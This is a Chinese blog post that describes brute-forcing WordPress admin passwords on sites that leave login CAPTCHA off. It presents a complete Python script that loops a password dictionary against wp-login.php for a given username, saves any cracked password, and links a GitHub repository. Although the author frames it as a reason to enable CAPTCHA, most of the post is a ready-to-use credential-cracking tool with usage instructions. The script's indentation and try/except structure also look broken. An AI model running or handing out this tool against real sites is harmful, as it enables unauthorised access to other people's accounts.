自己曾经折腾过一阵子wordpress的博客，说实话，wordpress在博客系统里面算是功能很强大的了，没有之一。
不过用wordpress的朋友可能都是贪图方便，很多设置都使用的默认，我之前使用的某一个wordpress版本中，它的后台没有任何干扰的验证码（因为它默认给用户关闭了，需要自己去后台开启，一般用户是使用缺省设置）。

所以只要使用python+urllib库，就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。

所以以后用wordpress的博客用户，平时还是把图片验证码的功能开启，怎样安全性会高很多。（其实python也带有一个破解一个验证码的库 - 。-！）

# coding=utf-8

# 破解wordpress 后台用户密码

import urllib, urllib2, time, re, cookielib,sys





class wordpress():

    def __init__(self, host, username):

		#初始化定义 header ，避免被服务器屏蔽

        self.username = username

        self.http="http://"+host

        self.url =  self.http + "/wp-login.php"

        self.redirect = self.http + "/wp-admin/"

        self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'

        self.referer=self.http+"/wp-login.php"

        self.cook="wordpress_test_cookie=WP+Cookie+check"

        self.host=host

        self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}

        self.cookie = cookielib.CookieJar()

        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))





    def crash(self, filename):

        try:

            pwd = open(filename, 'r')

			#读取密码文件，密码文件中密码越多破解的概率越大

            while 1 :

                i=pwd.readline()

                if not i :

                    break



                data = urllib.urlencode(

                    {"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})

                Req = urllib2.Request(url=self.url, data=data, headers=self.headers)

				#构造好数据包之后提交给wordpress网站后台

                Resp = urllib2.urlopen(Req)

                result = Resp.read()

                # print result

                login = re.search(r'login_error', result)

				#判断返回来的字符串，如果有login error说明失败了。

                if login:

                    pass

                else:

                    print "Crashed! password is %s %s" % (self.username,i.strip())

                    g=open("wordpress.txt",'w+')

                    g.write("Crashed! password is %s %s" % (self.username,i.strip()))

                    pwd.close()

                    g.close()

					#如果匹配到密码， 则这次任务完成，退出程序

                    exit()

                    break



            pwd.close()



			except Exception, e:

            print "error"

            print e

            print "Error in reading password"





if __name__ == "__main__":

    print "begin at " + time.ctime()

    host=sys.argv[1]

    #url = "http://"+host

	#给程序提供参数，为你要破解的网址

    user = sys.argv[2]

    dictfile=sys.argv[3]

	#提供你事先准备好的密码文件

    obj = wordpress(host, user)

    #obj.check(dictfile)

    obj.crash(dictfile)

    #obj.crash_v()

    print "end at " + time.ctime()

github源码：https://github.com/Rockyzsu/crashWordpressPassword

通知设置新通知